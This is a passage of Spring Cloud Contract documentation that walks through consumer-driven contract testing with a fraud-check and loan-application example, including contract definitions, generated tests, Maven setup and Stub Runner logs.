stubs\nby running the following commands:\n+\n[source,bash,indent=0]\n----\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n----\nTIP: The tests are being skipped because the Producer-side contract implementation is not\nin place yet, so the automatically-generated contract tests fail.\n* By getting already-existing producer service stubs from a remote repository. To do so,\npass the stub artifact IDs and artifact repository URL as `Spring Cloud Contract\nStub Runner` properties, as shown in the following example:\n+\n[source,yaml,indent=0]\n----\ninclude::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/samples\/standalone\/dsl\/http-client\/src\/test\/resources\/application-test-repo.yaml[]\n----\n\nNow you can annotate your test class with `@AutoConfigureStubRunner`. In the annotation,\nprovide the `group-id` and `artifact-id` values for `Spring Cloud Contract Stub Runner` to\nrun the collaborators' stubs for you, as shown in the following example:\n\n[source,java, indent=0]\n----\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment=WebEnvironment.NONE)\n@AutoConfigureStubRunner(ids = {\"com.example:http-server-dsl:+:stubs:6565\"},\n\t\tstubsMode = StubRunnerProperties.StubsMode.LOCAL)\n@DirtiesContext\npublic class LoanApplicationServiceTests {\n----\n\nTIP: Use the `REMOTE` `stubsMode` when downloading stubs from an online repository and\n`LOCAL` for offline work.\n\nNow, in your integration test, you can receive stubbed versions of HTTP responses or\nmessages that are expected to be emitted by the collaborator service.\n\n[[spring-cloud-contract-verifier-intro-three-minute-tour]]\n==== A Three-minute Tour\n\nThis brief tour walks through using Spring Cloud Contract:\n\n* <<spring-cloud-contract-verifier-intro-three-minute-tour-producer>>\n* <<spring-cloud-contract-verifier-intro-three-minute-tour-consumer>>\n\nYou can find an even more brief tour\n<<spring-cloud-contract-verifier-intro-three-second-tour,here>>.\n\n[[spring-cloud-contract-verifier-intro-three-minute-tour-producer]]\n===== On the Producer Side\n\nTo start working with `Spring Cloud Contract`, add files with `REST\/` messaging contracts\nexpressed in either Groovy DSL or YAML to the contracts directory, which is set by the\n`contractsDslDir` property. 
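\n\nA single HTTP contract, following the layout used in the step-by-step guide later in this chapter, could then be stored as in the following sketch:\n\n----\nsrc\/test\/resources\/contracts\/\n    fraud\/\n        shouldMarkClientAsFraud.groovy\n----\n\n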
By default, it is `$rootDir\/src\/test\/resources\/contracts`.\n\nFor the HTTP stubs, a contract defines what kind of response should be returned for a\ngiven request (taking into account the HTTP methods, URLs, headers, status codes, and so\non). The following example shows how an HTTP stub contract in Groovy DSL:\n\n[source,groovy,indent=0]\n----\npackage contracts\n\norg.springframework.cloud.contract.spec.Contract.make {\n\trequest {\n\t\tmethod 'PUT'\n\t\turl '\/fraudcheck'\n\t\tbody([\n\t\t\t \"client.id\": $(regex('[0-9]{10}')),\n\t\t\t loanAmount: 99999\n\t\t])\n\t\theaders {\n\t\t\tcontentType('application\/json')\n\t\t}\n\t}\n\tresponse {\n\t\tstatus 200\n\t\tbody([\n\t\t\t fraudCheckStatus: \"FRAUD\",\n\t\t\t \"rejection.reason\": \"Amount too high\"\n\t\t])\n\t\theaders {\n\t\t\tcontentType('application\/json')\n\t\t}\n\t}\n}\n----\n\nThe same contract expressed in YAML would look like the following example:\n\n[source,yaml,indent=0]\n----\nrequest:\n method: PUT\n url: \/fraudcheck\n body:\n \"client.id\": 1234567890\n loanAmount: 99999\n headers:\n Content-Type: application\/json\n matchers:\n body:\n - path: $.['client.id']\n type: by_regex\n value: \"[0-9]{10}\"\nresponse:\n status: 200\n body:\n fraudCheckStatus: \"FRAUD\"\n \"rejection.reason\": \"Amount too high\"\n headers:\n Content-Type: application\/json;charset=UTF-8\n----\n\nIn the case of messaging, you can define:\n\n* The input and the output messages can be defined (taking into account from and where it\nwas sent, the message body, and the header).\n* The methods that should be called after the message is received.\n* The methods that, when called, should trigger a message.\n\nThe following example shows a Camel messaging contract expressed in Groovy DSL:\n\n[source,groovy]\n----\ninclude::{verifier_core_path}\/src\/test\/groovy\/org\/springframework\/cloud\/contract\/verifier\/builder\/MessagingMethodBodyBuilderSpec.groovy[tags=trigger_no_output_dsl]\n----\n\nThe following example shows the same contract expressed in YAML:\n\n[source,yml,indent=0]\n----\ninclude::{verifier_core_path}\/src\/test\/resources\/yml\/contract_message_scenario3.yml[indent=0]\n----\n\nThen you can add Spring Cloud Contract Verifier dependency and plugin to your build file,\nas shown in the following example:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=verifier_test_dependencies,indent=0]\n----\n\nThe following listing shows how to add the plugin, which should go in the build\/plugins\nportion of the file:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.springframework.cloud<\/groupId>\n\t<artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n\t<version>${spring-cloud-contract.version}<\/version>\n\t<extensions>true<\/extensions>\n<\/plugin>\n----\n\nRunning `.\/mvnw clean install` automatically generates tests that verify the application\ncompliance with the added contracts. 
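\n\nBefore looking at a generated test, it may help to see the consumer's side of the same contract. A call that satisfies the fraud-check contract above could look like the following sketch (the RestTemplate usage, host, and port are assumptions, and the usual Spring imports are omitted):\n\n[source,java,indent=0]\n----\nRestTemplate restTemplate = new RestTemplate();\nHttpHeaders headers = new HttpHeaders();\nheaders.setContentType(MediaType.APPLICATION_JSON);\n\/\/ \"client.id\" satisfies the [0-9]{10} regular expression from the contract\nHttpEntity<String> request = new HttpEntity<>(\n\t\t\"{\\\"client.id\\\":\\\"1234567890\\\",\\\"loanAmount\\\":99999}\", headers);\nResponseEntity<String> response = restTemplate.exchange(\n\t\t\"http:\/\/localhost:8080\/fraudcheck\", HttpMethod.PUT, request, String.class);\n\/\/ the stub (or the real service) replies with fraudCheckStatus FRAUD\n----\n\n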
By default, the generated tests are under\n`org.springframework.cloud.contract.verifier.tests.`.\n\nThe following example shows a sample auto-generated test for an HTTP contract:\n\n[source,java,indent=0]\n----\n@Test\npublic void validate_shouldMarkClientAsFraud() throws Exception {\n \/\/ given:\n MockMvcRequestSpecification request = given()\n .header(\"Content-Type\", \"application\/vnd.fraud.v1+json\")\n .body(\"{\\\"client.id\\\":\\\"1234567890\\\",\\\"loanAmount\\\":99999}\");\n\n \/\/ when:\n ResponseOptions response = given().spec(request)\n .put(\"\/fraudcheck\");\n\n \/\/ then:\n assertThat(response.statusCode()).isEqualTo(200);\n assertThat(response.header(\"Content-Type\")).matches(\"application\/vnd.fraud.v1.json.*\");\n \/\/ and:\n DocumentContext parsedJson = JsonPath.parse(response.getBody().asString());\n assertThatJson(parsedJson).field(\"['fraudCheckStatus']\").matches(\"[A-Z]{5}\");\n assertThatJson(parsedJson).field(\"['rejection.reason']\").isEqualTo(\"Amount too high\");\n}\n----\n\nThe preceding example uses Spring's `MockMvc` to run the tests. This is the default test\nmode for HTTP contracts. However, JAX-RX client and explicit HTTP invocations can also be\nused. (To do so, change the `testMode` property of the plugin to `JAX-RS` or `EXPLICIT`,\nrespectively.)\n\nApart from the default JUnit, you can instead use Spock tests, by setting the plugin\n`testFramework` property to `Spock`.\n\nTIP: You can now also generate WireMock scenarios based on the contracts, by including an\norder number followed by an underscore at the beginning of the contract file names.\n\nThe following example shows an auto-generated test in Spock for a messaging stub contract:\n\n [source,groovy,indent=0]\n----\ngiven:\n\t ContractVerifierMessage inputMessage = contractVerifierMessaging.create(\n\t\t\\'\\'\\'{\"bookName\":\"foo\"}\\'\\'\\',\n\t\t['sample': 'header']\n\t)\n\nwhen:\n\t contractVerifierMessaging.send(inputMessage, 'jms:delete')\n\nthen:\n\t noExceptionThrown()\n\t bookWasDeleted()\n----\n\nAs the implementation of the functionalities described by the contracts is not yet\npresent, the tests fail.\n\nTo make them pass, you must add the correct implementation of handling either HTTP\nrequests or messages. Also, you must add a correct base test class for auto-generated\ntests to the project. 
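\n\nFor the messaging example above, such a base class could look like the following sketch (the class name and the body of the verification method are assumptions; the generated Spock test shown earlier calls bookWasDeleted() on it):\n\n[source,java,indent=0]\n----\npackage com.example;\n\npublic abstract class BookDeleteBase {\n\n\t\/\/ called by the generated test after the message is sent to jms:delete\n\tpublic void bookWasDeleted() {\n\t\t\/\/ assert on an observable side effect here, for example that the\n\t\t\/\/ book is gone from a repository or that a listener recorded it\n\t}\n}\n----\n\n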
This class is extended by all the auto-generated tests and should\ncontain all the setup necessary to run them (for example, `RestAssuredMockMvc` controller\nsetup or messaging test setup).\n\nOnce the implementation and the test base class are in place, the tests pass, and both the\napplication and the stub artifacts are built and installed in the local Maven repository.\nInformation about installing the stubs jar to the local repository appears in the logs, as\nshown in the following example:\n\n[source,bash,indent=0]\n----\n [INFO] --- spring-cloud-contract-maven-plugin:1.0.0.BUILD-SNAPSHOT:generateStubs (default-generateStubs) @ http-server ---\n [INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar\n [INFO]\n [INFO] --- maven-jar-plugin:2.6:jar (default-jar) @ http-server ---\n [INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar\n [INFO]\n [INFO] --- spring-boot-maven-plugin:1.5.5.BUILD-SNAPSHOT:repackage (default) @ http-server ---\n [INFO]\n [INFO] --- maven-install-plugin:2.5.2:install (default-install) @ http-server ---\n [INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.jar\n [INFO] Installing \/some\/path\/http-server\/pom.xml to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.pom\n [INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n----\n\nYou can now merge the changes and publish both the application and the stub artifacts\nin an online repository.\n\n*Docker Project*\n\nIn order to enable working with contracts while creating applications in non-JVM\ntechnologies, the `springcloud\/spring-cloud-contract` Docker image has been created. It\ncontains a project that automatically generates tests for HTTP contracts and executes them\nin `EXPLICIT` test mode. Then, if the tests pass, it generates Wiremock stubs and,\noptionally, publishes them to an artifact manager. In order to use the image, you can\nmount the contracts into the `\/contracts` directory and set a few environment variables.\n\/\/ TODO: We should answer the obvious question: Which environment variables?\n\n[[spring-cloud-contract-verifier-intro-three-minute-tour-consumer]]\n===== On the Consumer Side\n\n`Spring Cloud Contract Stub Runner` can be used in the integration tests to get a running\nWireMock instance or messaging route that simulates the actual service.\n\nTo get started, add the dependency to `Spring Cloud Contract Stub Runner`:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=stub_runner,indent=0]\n----\n\nYou can get the Producer-side stubs installed in your Maven repository in either of two\nways:\n\n* By checking out the Producer side repository and adding contracts and generating the\nstubs by running the following commands:\n+\n[source,bash,indent=0]\n----\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n----\nNOTE: The tests are skipped because the Producer-side contract implementation is not yet\nin place, so the automatically-generated contract tests fail.\n* Getting already existing producer service stubs from a remote repository. 
To do so,\npass the stub artifact IDs and artifact repository URl as `Spring Cloud Contract Stub\nRunner` properties, as shown in the following example:\n+\n[source,yaml,indent=0]\n----\ninclude::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/samples\/standalone\/dsl\/http-client\/src\/test\/resources\/application-test-repo.yaml[]\n----\n\nNow you can annotate your test class with `@AutoConfigureStubRunner`. In the annotation,\nprovide the `group-id` and `artifact-id` for `Spring Cloud Contract Stub Runner` to run\nthe collaborators' stubs for you, as shown in the following example:\n\n[source,java, indent=0]\n----\n@RunWith(SpringRunner.class)\n@SpringBootTest(webEnvironment=WebEnvironment.NONE)\n@AutoConfigureStubRunner(ids = {\"com.example:http-server-dsl:+:stubs:6565\"},\n\t\tstubsMode = StubRunnerProperties.StubsMode.LOCAL)\n@DirtiesContext\npublic class LoanApplicationServiceTests {\n----\n\nTIP: Use the `REMOTE` `stubsMode` when downloading stubs from an online repository and\n`LOCAL` for offline work.\n\nIn your integration test, you can receive stubbed versions of HTTP responses or messages\nthat are expected to be emitted by the collaborator service. You can see entries similar\nto the following in the build logs:\n\n[source,bash,indent=0]\n----\n2016-07-19 14:22:25.403 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Desired version is + - will try to resolve the latest version\n2016-07-19 14:22:25.438 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved version is 0.0.1-SNAPSHOT\n2016-07-19 14:22:25.439 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolving artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT using remote repositories []\n2016-07-19 14:22:25.451 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n2016-07-19 14:22:25.465 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacking stub from JAR [URI: file:\/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar]\n2016-07-19 14:22:25.475 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacked file to [\/var\/folders\/0p\/xwq47sq106x1_g3dtv6qfm940000gq\/T\/contracts100276532569594265]\n2016-07-19 14:22:27.737 INFO 41050 --- [ main] o.s.c.c.stubrunner.StubRunnerExecutor : All stubs are now running RunningStubs [namesAndPorts={com.example:http-server:0.0.1-SNAPSHOT:stubs=8080}]\n----\n\n\n==== Defining the Contract\n\nAs consumers of services, we need to define what exactly we want to achieve. We need to\nformulate our expectations. That is why we write contracts.\n\nAssume that you want to send a request containing the ID of a client company and the\namount it wants to borrow from us. 
You also want to send it to the \/fraudcheck url via\nthe PUT method.\n\n.Groovy DSL\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.groovy[]\n----\n\n.YAML\n[source,yml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/yml\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.yml[]\n----\n\n==== Client Side\n\nSpring Cloud Contract generates stubs, which you can use during client-side testing.\nYou get a running WireMock instance\/Messaging route that simulates the service.\nYou would like to feed that instance with a proper stub definition.\n\nAt some point in time, you need to send a request to the Fraud Detection service.\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/main\/java\/com\/example\/loan\/LoanApplicationService.java[tags=client_call_server,indent=0]\n----\n\nAnnotate your test class with `@AutoConfigureStubRunner`. In the annotation provide the group id and artifact id for the Stub Runner to download stubs of your collaborators.\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/test\/java\/com\/example\/loan\/LoanApplicationServiceTests.java[tags=autoconfigure_stubrunner,indent=0]\n----\n\nAfter that, during the tests, Spring Cloud Contract automatically finds the stubs\n(simulating the real service) in the Maven repository and exposes them on a configured\n(or random) port.\n\n==== Server Side\n\nSince you are developing your stub, you need to be sure that it actually resembles your\nconcrete implementation. You cannot have a situation where your stub acts in one way and\nyour application behaves in a different way, especially in production.\n\nTo ensure that your application behaves the way you define in your stub, tests are\ngenerated from the stub you provide.\n\nThe autogenerated test looks, more or less, like this:\n\n[source,java,indent=0]\n----\n@Test\npublic void validate_shouldMarkClientAsFraud() throws Exception {\n \/\/ given:\n MockMvcRequestSpecification request = given()\n .header(\"Content-Type\", \"application\/vnd.fraud.v1+json\")\n .body(\"{\\\"client.id\\\":\\\"1234567890\\\",\\\"loanAmount\\\":99999}\");\n\n \/\/ when:\n ResponseOptions response = given().spec(request)\n .put(\"\/fraudcheck\");\n\n \/\/ then:\n assertThat(response.statusCode()).isEqualTo(200);\n assertThat(response.header(\"Content-Type\")).matches(\"application\/vnd.fraud.v1.json.*\");\n \/\/ and:\n DocumentContext parsedJson = JsonPath.parse(response.getBody().asString());\n assertThatJson(parsedJson).field(\"['fraudCheckStatus']\").matches(\"[A-Z]{5}\");\n assertThatJson(parsedJson).field(\"['rejection.reason']\").isEqualTo(\"Amount too high\");\n}\n----\n\n=== Step-by-step Guide to Consumer Driven Contracts (CDC)\n\nConsider an example of Fraud Detection and the Loan Issuance process. The business\nscenario is such that we want to issue loans to people but do not want them to steal from\nus. The current implementation of our system grants loans to everybody.\n\nAssume that `Loan Issuance` is a client to the `Fraud Detection` server. 
In the current\nsprint, we must develop a new feature: if a client wants to borrow too much money, then\nwe mark the client as a fraud.\n\nTechnical remark - Fraud Detection has an `artifact-id` of `http-server`, while Loan\nIssuance has an artifact-id of `http-client`, and both have a `group-id` of `com.example`.\n\nSocial remark - both client and server development teams need to communicate directly and\ndiscuss changes while going through the process. CDC is all about communication.\n\nThe https:\/\/github.com\/spring-cloud\/spring-cloud-contract\/tree\/{branch}\/samples\/standalone\/dsl\/http-server[server\nside code is available here] and https:\/\/github.com\/spring-cloud\/spring-cloud-contract\/tree\/{branch}\/samples\/standalone\/dsl\/http-client[the\nclient code here].\n\nTIP: In this case, the producer owns the contracts. Physically, all the contract are\nin the producer's repository.\n\n==== Technical note\n\nIf using the *SNAPSHOT* \/ *Milestone* \/ *Release Candidate* versions please add the\nfollowing section to your build:\n\n[source,xml,indent=0,subs=\"verbatim,attributes\",role=\"primary\"]\n.Maven\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=repos,indent=0]\n----\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\",role=\"secondary\"]\n.Gradle\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/build.gradle[tags=deps_repos,indent=0]\n----\n\n==== Consumer side (Loan Issuance)\n\nAs a developer of the Loan Issuance service (a consumer of the Fraud Detection server), you might do the following steps:\n\n. Start doing TDD by writing a test for your feature.\n. Write the missing implementation.\n. Clone the Fraud Detection service repository locally.\n. Define the contract locally in the repo of Fraud Detection service.\n. Add the Spring Cloud Contract Verifier plugin.\n. Run the integration tests.\n. File a pull request.\n. Create an initial implementation.\n. Take over the pull request.\n. Write the missing implementation.\n. Deploy your app.\n. Work online.\n\n*Start doing TDD by writing a test for your feature.*\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/test\/java\/com\/example\/loan\/LoanApplicationServiceTests.java[tags=client_tdd,indent=0]\n----\n\nAssume that you have written a test of your new feature. If a loan application for a big\namount is received, the system should reject that loan application with some description.\n\n*Write the missing implementation.*\n\nAt some point in time, you need to send a request to the Fraud Detection service. Assume\nthat you need to send the request containing the ID of the client and the amount the\nclient wants to borrow. You want to send it to the `\/fraudcheck` url via the `PUT` method.\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/main\/java\/com\/example\/loan\/LoanApplicationService.java[tags=client_call_server,indent=0]\n----\n\nFor simplicity, the port of the Fraud Detection service is set to `8080`, and the\napplication runs on `8090`.\n\nIf you start the test at this point, it breaks, because no service currently runs on port\n`8080`.\n\n*Clone the Fraud Detection service repository locally.*\n\nYou can start by playing around with the server side contract. 
To do so, you must first\nclone it.\n\n[source,bash,indent=0]\n----\n$ git clone https:\/\/your-git-server.com\/server-side.git local-http-server-repo\n----\n\n*Define the contract locally in the repo of Fraud Detection service.*\n\nAs a consumer, you need to define what exactly you want to achieve. You need to formulate\nyour expectations. To do so, write the following contract:\n\nIMPORTANT: Place the contract under `src\/test\/resources\/contracts\/fraud` folder. The `fraud` folder\nis important because the producer's test base class name references that folder.\n\n.Groovy DSL\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.groovy[]\n----\n\n.YAML\n[source,yml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/yml\/http-server\/src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.yml[]\n----\n\nThe YML contract is quite straight-forward. However when you take a look at the Contract\nwritten using a statically typed Groovy DSL - you might wonder what the\n`value(client(...), server(...))` parts are. By using this notation, Spring Cloud\nContract lets you define parts of a JSON block, a URL, etc., which are dynamic. In case\nof an identifier or a timestamp, you need not hardcode a value. You want to allow some\ndifferent ranges of values. To enable ranges of values, you can set regular expressions\nmatching those values for the consumer side. You can provide the body by means of either\na map notation or String with interpolations.\nhttps:\/\/cloud.spring.io\/spring-cloud-contract\/single\/spring-cloud-contract.html#_contract_dsl[Consult the docs\nfor more information.] We highly recommend using the map notation!\n\nTIP: You must understand the map notation in order to set up contracts. Please read the\nhttp:\/\/groovy-lang.org\/json.html[Groovy docs regarding JSON].\n\nThe previously shown contract is an agreement between two sides that:\n\n- if an HTTP request is sent with all of\n** a `PUT` method on the `\/fraudcheck` endpoint,\n** a JSON body with a `client.id` that matches the regular expression `[0-9]{10}` and\n`loanAmount` equal to `99999`,\n** and a `Content-Type` header with a value of `application\/vnd.fraud.v1+json`,\n- then an HTTP response is sent to the consumer that\n** has status `200`,\n** contains a JSON body with the `fraudCheckStatus` field containing a value `FRAUD` and\nthe `rejectionReason` field having value `Amount too high`,\n** and a `Content-Type` header with a value of `application\/vnd.fraud.v1+json`.\n\nOnce you are ready to check the API in practice in the integration tests, you need to\ninstall the stubs locally.\n\n*Add the Spring Cloud Contract Verifier plugin.*\n\nWe can add either a Maven or a Gradle plugin. 
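\n\nFor Gradle users, the rough equivalent of the Maven setup below is the following sketch (the exact coordinates and notation may differ between versions, so treat it as an outline rather than a drop-in snippet):\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath \"org.springframework.cloud:spring-cloud-contract-gradle-plugin:${verifierVersion}\"\n\t}\n}\n\napply plugin: 'spring-cloud-contract'\n----\n\n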
In this example, you see how to add Maven.\nFirst, add the `Spring Cloud Contract` BOM.\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=contract_bom,indent=0]\n----\n\nNext, add the `Spring Cloud Contract Verifier` Maven plugin\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=contract_maven_plugin,indent=0]\n----\n\nSince the plugin was added, you get the `Spring Cloud Contract Verifier` features which,\nfrom the provided contracts:\n\n- generate and run tests\n- produce and install stubs\n\nYou do not want to generate tests since you, as the consumer, want only to play with the\nstubs. You need to skip the test generation and execution. When you execute:\n\n[source,bash,indent=0]\n----\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n----\n\nIn the logs, you see something like this:\n\n[source,bash,indent=0]\n----\n[INFO] --- spring-cloud-contract-maven-plugin:1.0.0.BUILD-SNAPSHOT:generateStubs (default-generateStubs) @ http-server ---\n[INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar\n[INFO]\n[INFO] --- maven-jar-plugin:2.6:jar (default-jar) @ http-server ---\n[INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar\n[INFO]\n[INFO] --- spring-boot-maven-plugin:1.5.5.BUILD-SNAPSHOT:repackage (default) @ http-server ---\n[INFO]\n[INFO] --- maven-install-plugin:2.5.2:install (default-install) @ http-server ---\n[INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.jar\n[INFO] Installing \/some\/path\/http-server\/pom.xml to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.pom\n[INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n----\n\nThe following line is extremely important:\n\n[source,bash,indent=0]\n----\n[INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n----\n\nIt confirms that the stubs of the `http-server` have been installed in the local\nrepository.\n\n*Run the integration tests.*\n\nIn order to profit from the Spring Cloud Contract Stub Runner functionality of automatic\nstub downloading, you must do the following in your consumer side project (`Loan\nApplication service`):\n\nAdd the `Spring Cloud Contract` BOM:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=contract_bom,indent=0]\n----\n\nAdd the dependency to `Spring Cloud Contract Stub Runner`:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=stub_runner,indent=0]\n----\n\nAnnotate your test class with `@AutoConfigureStubRunner`. In the annotation, provide the\n`group-id` and `artifact-id` for the Stub Runner to download the stubs of your\ncollaborators. 
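\n\nThe `ids` notation packs the full stub coordinates into a single string, as decoded in the following sketch (the trailing port is optional, and `+` asks for the highest available version, as the Stub Runner logs below confirm):\n\n[source,java,indent=0]\n----\n\/\/ groupId : artifactId : version : classifier : port\n@AutoConfigureStubRunner(ids = {\"com.example:http-server:+:stubs:8080\"},\n\t\tstubsMode = StubRunnerProperties.StubsMode.LOCAL)\n----\n\n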
(Optional step) Because you're playing with the collaborators offline, you\ncan also provide the offline work switch (`StubRunnerProperties.StubsMode.LOCAL`).\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/test\/java\/com\/example\/loan\/LoanApplicationServiceTests.java[tags=autoconfigure_stubrunner,indent=0]\n----\n\nNow, when you run your tests, you see something like this:\n\n[source,bash,indent=0]\n----\n2016-07-19 14:22:25.403 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Desired version is + - will try to resolve the latest version\n2016-07-19 14:22:25.438 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved version is 0.0.1-SNAPSHOT\n2016-07-19 14:22:25.439 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolving artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT using remote repositories []\n2016-07-19 14:22:25.451 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n2016-07-19 14:22:25.465 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacking stub from JAR [URI: file:\/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar]\n2016-07-19 14:22:25.475 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacked file to [\/var\/folders\/0p\/xwq47sq106x1_g3dtv6qfm940000gq\/T\/contracts100276532569594265]\n2016-07-19 14:22:27.737 INFO 41050 --- [ main] o.s.c.c.stubrunner.StubRunnerExecutor : All stubs are now running RunningStubs [namesAndPorts={com.example:http-server:0.0.1-SNAPSHOT:stubs=8080}]\n----\n\nThis output means that Stub Runner has found your stubs and started a server for your app\nwith group id `com.example`, artifact id `http-server` with version `0.0.1-SNAPSHOT` of\nthe stubs and with `stubs` classifier on port `8080`.\n\n*File a pull request.*\n\nWhat you have done until now is an iterative process. You can play around with the\ncontract, install it locally, and work on the consumer side until the contract works as\nyou wish.\n\nOnce you are satisfied with the results and the test passes, publish a pull request to\nthe server side. 
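The exact commands depend on your Git hosting, but an illustrative sequence (the fork URL is hypothetical) might be:\n\n[source,bash,indent=0]\n----\n$ git checkout -b contract-change-pr\n$ git add src\/test\/resources\/contracts\/fraud\/shouldMarkClientAsFraud.groovy\n$ git commit -m \"Propose the fraud check contract\"\n$ git push https:\/\/your-git-server.com\/server-side-fork.git contract-change-pr\n----\n\n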
Currently, the consumer side work is done.\n\n==== Producer side (Fraud Detection server)\n\nAs a developer of the Fraud Detection server (a server to the Loan Issuance service):\n\n*Create an initial implementation.*\n\nAs a reminder, you can see the initial implementation here:\n\n[source,java,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=server_api,indent=0]\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=initial_impl,indent=0]\n}\n----\n\n*Take over the pull request.*\n\n[source,bash,indent=0]\n----\n$ git checkout -b contract-change-pr master\n$ git pull https:\/\/your-git-server.com\/server-side-fork.git contract-change-pr\n----\n\nYou must add the dependencies needed by the autogenerated tests:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=verifier_test_dependencies,indent=0]\n----\n\nIn the configuration of the Maven plugin, pass the `packageWithBaseClasses` 